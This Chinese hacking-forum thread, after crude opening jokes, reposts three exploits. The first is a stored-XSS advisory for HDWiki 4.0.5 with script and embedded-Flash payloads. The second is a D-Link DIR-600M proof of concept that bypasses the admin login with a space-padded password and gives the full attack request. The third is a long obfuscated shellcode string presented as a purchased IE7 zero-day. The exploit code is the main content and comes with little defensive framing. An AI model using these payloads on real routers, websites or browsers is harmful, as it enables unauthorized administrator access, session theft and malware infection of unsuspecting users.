最近看过此主题的会员

返回列表 发帖

第一次被爆菊

开始潜修,基友约吗?
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:zhneb发表,本帖发表者zhneb符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者zhneb和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

连长这里有一个嫩菊待爆,把你的兵拉一车来,对东风大卡车那种!

TOP

HDWiki-V4.0.5-0day跨站漏洞
影响版本:HDWiki-V4.0.5危害程度:高危漏洞描述:安天实验室信息安全研究与应急处理中心(Antiy CERT)通过渗透测试发现HDWiki-V4.0.5这个版本在创建编辑词条时,对于里面HTML元素没有很好的过滤,导致可以持久性跨站并挂马,如果用户访问该类被攻击者修改过并插入恶意跨站代码的页面将可能导致盗取用户敏感信息、感染木马病毒等。 注:经测试此跨站漏洞对互动百科官方主站无效。测试环境:Windows XP SP2+IE6.0 & Windows XP SP3+IE8.0 测试方法:本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!1、URL:http://10.0.6.139/wiki/index.php?doc-view-2XSSCode:<IMG SRC=javascript:alert('XSS')>
2、URL:http://10.0.6.139/wiki/index.php?doc-view-3XSSCode:<IMG SRC="javascript:alert('XSS');">
3、URL:http://10.0.6.139/wiki/index.php?doc-view-4XSSCode:<EMBED SRC="http://10.0.54.55/33.swf" AllowScriptAccess="always"></EMBED>http://10.0.54.55/33.swf  是一个Flash链接,Flash文件内部使用了弹网页的函数,所以只要Flash解析成功触发这个函数就会弹出一个网页


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

D-Link DIR-600M Wireless N 150管理员密码绕过漏洞
# Exploit Title: D-Link DIR-600M Wireless N 150 Login Page Bypass
# Date: 19-05-2017
# Software Link: http://www.dlink.co.in/products/?pid=DIR-600M
# Exploit Author: Touhid M.Shaikh
# Vendor : www.dlink.com
# Contact : http://twitter.com/touhidshaikh22
# Version: Hardware version: C1
Firmware version: 3.04
# Tested on:All Platforms


1) Description

After Successfully Connected to D-Link DIR-600M Wireless N 150
Router(FirmWare Version : 3.04), Any User Can Easily Bypass The Router's
Admin Panel Just by Feeding Blank Spaces in the password Field.

Its More Dangerous when your Router has a public IP with remote login
enabled.

For More Details : www.touhidshaikh.com/blog/

IN MY CASE,
Router IP : http://192.168.100.1



Video POC : https://www.youtube.com/watch?v=waIJKWCpyNQring

2) Proof of Concept

Step 1: Go to
Router Login Page : http://192.168.100.1/login.htm

Step 2:
Fill username: admin
And in Password Fill more than 20 tims Spaces(" ")



Our Request Is look like below.
-----------------ATTACKER REQUEST-----------------------------------

POST /login.cgi HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/login.htm
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

username=Admin&password=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send



--------------------END here------------------------

Bingooo You got admin Access on router.
Now you can download/upload settiing, Change setting etc.




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

IE7 0day 传说中卖12W
IE7 0day 传说中卖12W
源代码在附件包中:IE7-0day.rar
dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong
3358dadongB3DBdadong031Cdadong31C3dadong66C9dadongE981dadongFA65da
dong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong012
1dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadong
CAD9dadong7F24dadong85D2dadongF1DEdadongD7C9dadongDEDEdadongC9DEda
dong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong20
6Cdadong2121dadong67C9dadong2121dadongC921dadong22FAdadong2121dadong
D9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9d
adong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong
2121dadongC921dadong2040dadong2121dadong3BC9dadong2121dadongCA21
dadong7279dadongFDAAdadong4B72dadong4961dadong3121dadong2121da
dongC976dadong2390dadong2121dadongC4C9dadong2121dadong7921dadong7
2E2dadongFDAAdadong4B72dadong4901dadong3121dadong2121dadongC976d
adong23B8dadong2121dadongECC9dadong2121dadong7921dadong76E2dadon
g1DC9dadong2125dadongAA21dadong12D9dadong68E8dadongE112dadongE29
1dadongD3DDdadongAC8FdadongDE66dadongE27Edadong1F7Adadong26E7dad
ong1F99dadong7EA8dadong4720dadongE61Fdadong2466dadongC1DEdadongC
8E2dadong25B4dadong2121dadongA07Adadong35CDdadong2120dadongAA21d
adong1FF5dadong23E6dadong4C42dadong0145dadongE61Fdadong2563dadong
420Edadong0301dadongE3A2dadong1229dadong71E1dadong4971dadong2025
dadong2121dadong7273dadongC971dadong22E0dadong2121dadongF1DEdado
ngDDAAdadongE6AAdadongE1A2dadong1F29dadong39ABdadongFAA5dadong22
55dadongCA61dadong1FD7dadong21E7dadong1203dadong1FF3dadong71A9dad
ongA220dadong75CDdadongE112dadongFA12dadongEDAAdadongD9A2dadong5
C75dadong1F28dadong3DA8dadongA220dadong25E1dadongD3CAdadongEDAAd
adongF8AAdadongE2A2dadong1231dadong1FE1dadong62E6dadong200Ddadong
2121dadong7021dadong7172dadong7171dadong7171dadong7671dadongC971
dadong2218dadong2121dadong38C9dadong2121dadong4521dadong2580dado
ng2121dadongAC21dadong4181dadongDEDEdadongC9DEdadong2216dadong212
1dadongFA12dadong7272dadong7272dadongF1DEdadong19A1dadongA1C9dadon
gC819dadong2E54dadong59A0dadongB124dadongB1B1dadong55B1dadong7427d
adongCDAAdadong61ACdadongDE24dadongC9C1dadongDE0FdadongDEDEdadong
C9E2dadongDE09dadongDEDEdadong3099dadong2520dadongE3A1dadong212Dd
adong3AC9dadongDEDEdadong12DEdadong71E1dadongC975dadong2175dadong
2121dadongC971dadong23AAdadong2121dadongF1DEdadongA117dadong051Dda
dong5621dadongC92Bdadong2360dadong2121dadongDE12dadongDE76dadongC9
F1dadong20DAdadong2121dadongDE49dadong2121dadongDE21dadongC9F1dado
ngDFC9dadongDEDEdadong7672dadong1277dadong71E1dadongC975dadong213F
dadong2121dadongC971dadong2374dadong2121dadongF1DEdadongA117dadong
051Ddadong5621dadongC92Bdadong232Adadong2121dadongDE12dadongDE76da
dong79F1dadong7E7FdadongE27Adadong23CAdadongE279dadongD8C9dadongDE
DEdadong77DEdadongA276dadong29CDdadongDDAAdadong294Bdadong1F76dado
ng56DEdadongC935dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049
dadong444Cdadong4921dadong6468dadong5367dadongD5AAdadong2998dadong
2121dadongD221dadong5487dadong4B0Edadong1F21dadong55DEdadong0105da
dong05C9dadong2123dadongDE21dadongAAF1dadongC9D9dadong20EAdadong21
21dadongF1DEdadongD91Adadong2955dadongAA17dadong0565dadong1F01dado
ng21DEdadongDE1Fdadong0555dadongC93Ddadong20CEdadong2121dadongF1DE
dadongE5A2dadong7E31dadong997Fdadong2120dadong2121dadong49E2dadong
4F4Edadong2121dadong5449dadong4D53dadongCA4CdadongAC34dadong0565da
dong7125dadong03C9dadongDEDFdadong71DEdadong6BC9dadong2123dadongC8
21dadongDFC3dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong29E5dad
ong4BE2dadong494Ddadong554Fdadong4D45dadong34CAdadong65ACdadong250
5dadongC971dadongDCDAdadongDEDEdadongC971dadong2302dadong2121dado
ng9AC8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE22
9dadong1249dadong2113dadong4921dadong5254dadong5344dadong34CAdadon
g65ACdadong2505dadongC971dadongDCF0dadongDEDEdadongC971dadong20D8
dadong2121dadongB0C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadon
gE5A2dadongE229dadong4249dadong5657dadong4921dadong4952dadong4E45d
adong34CAdadong65ACdadong2505dadongC971dadongDC86dadongDEDEdadong
C971dadong20EEdadong2121dadong46C8dadongDEDFdadongC9DEdadongDEC7d
adongDEDEdadongE5A2dadongE229dadong5749dadong5946dadongCA21dadongA
C34dadong0565dadong7125dadongA3C9dadongDEDCdadong71DEdadong8BC9da
dong2120dadongC821dadongDF63dadongDEDEdadongC7C9dadongDEDEdadongA
2DEdadong25E5dadongC9E2dadong208Adadong2121dadong3A49dadong67E7dad
ong7158dadongE7C9dadong2120dadongA221dadong29E5dadongC9E2dadong20B
6dadong2121dadongCD49dadong22B6dadong712Ddadong93C9dadong2120dadon
gA221dadong29E5dadongC9E2dadong20A2dadong2121dadong8B49dadong2CDDd
adong715DdadongBFC9dadong2120dadongA221dadong29E5dadongC9E2dadong2
04Edadong2121dadongCC49dadongCE77dadong7117dadongABC9dadong2120dad
ongA221dadong29E5dadongC9E2dadong207Adadong2121dadongD149dadong25A
Bdadong717Edadong57C9dadong2120dadongA221dadong29E5dadongC9E2dadon
gDFD6dadongDEDEdadong5949dadongFA49dadong713Ddadong43C9dadong2120d
adongA221dadong29E5dadongC9E2dadong2012dadong2121dadongCE49dadongC
1EFdadong7141dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2dad
ong203Edadong2121dadong9149dadong0C68dadong71FAdadong1BC9dadong212
0dadongA221dadong29E5dadongC9E2dadongDE17dadongDEDEdadong8A49dadon
gBA7Fdadong713Fdadong07C9dadong2120dadongA221dadong29E5dadongC9E2d
adongDF86dadongDEDEdadong7849dadongA0B6dadong7123dadong33C9dadong2
120dadongA221dadong29E5dadongC9E2dadong21C2dadong2121dadong5F49dad
ongC3F9dadong7152dadongDFC9dadong2121dadongA221dadong29E5dadongC9E
2dadong21EEdadong2121dadongBF49dadong9AD8dadong7114dadongCBC9dadon
g2121dadongA221dadong29E5dadongC9E2dadongDFB3dadongDEDEdadong7649d
adong9481dadong719AdadongF7C9dadong2121dadongA221dadong29E5dadongC
9E2dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123dadongE3C9dad
ong2121dadongA221dadong29E5dadongC9E2dadongDF4BdadongDEDEdadongC14
9dadong117Adadong71B5dadong8FC9dadong2121dadongA221dadong29E5dadon
gC9E2dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182dadongBBC9d
adong2121dadongA221dadong29E5dadongC9E2dadongDF63dadongDEDEdadong4
949dadongE405dadong7192dadongA7C9dadong2121dadongA221dadong29E5dad
ongC9E2dadong2176dadong2121dadong5349dadong92DFdadong7137dadong53C
9dadong2121dadongA221dadong29E5dadongC9E2dadongDF65dadongDEDEdadon
g32CAdadong444BdadongC971dadongDAD6dadongDEDEdadongC971dadongDF8A
dadongDEDEdadong96C8dadongDEDDdadongC9DEdadongDEC9dadongDEDEdadon
gC9E2dadongDC88dadongDEDEdadong6E49dadong6ECEdadong7124dadong1FC9d
adong2121dadongA221dadong29E5dadongC9E2dadong212Edadong2121dadongA
F49dadong2F6Fdadong71CDdadong0BC9dadong2121dadongA221dadong29E5dad
ong12E2dadong45E1dadong61AAdadongA411dadong59E1dadong1F31dadong61A
Adadong1F2Ddadong51AAdadong8C3DdadongAA1Fdadong2961dadongCAE2dadon
g1F2Adadong61AAdadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2d
adongAA17dadong054Ddadong1705dadong64AAdadong171Ddadong75AAdadong5
924dadongF422dadongAA1Fdadong396BdadongAA1Fdadong017BdadongFC22dado
ng1AC2dadong1F68dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1
dadongA58Ddadong55E1dadongE026dadong2CEEdadongD922dadongD5CAdadong
1A17dadong055Ddadong5409dadong1FFEdadong7BAAdadong2205dadong47FCda
dongAA1Fdadong6A2DdadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA
25dadongE422dadongA817dadong0565dadong403DdadongC9E2dadongDA47dado
ngDEDEdadong5549dadong5155dadong0E1Bdadong560Edadong5656dadong430F
dadong4840dadong444Adadong0F42dadong4F42dadong450Edadong564Edadong0
E4Fdadong4E4Adadong440Fdadong4459dadong2121dadong2121dadong2121dad
ong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong212
1dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadon
g2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121d
adong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2
121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dad
ong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong212
1dadong2121dadong2121dadong2121dadong2121dadong0021


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表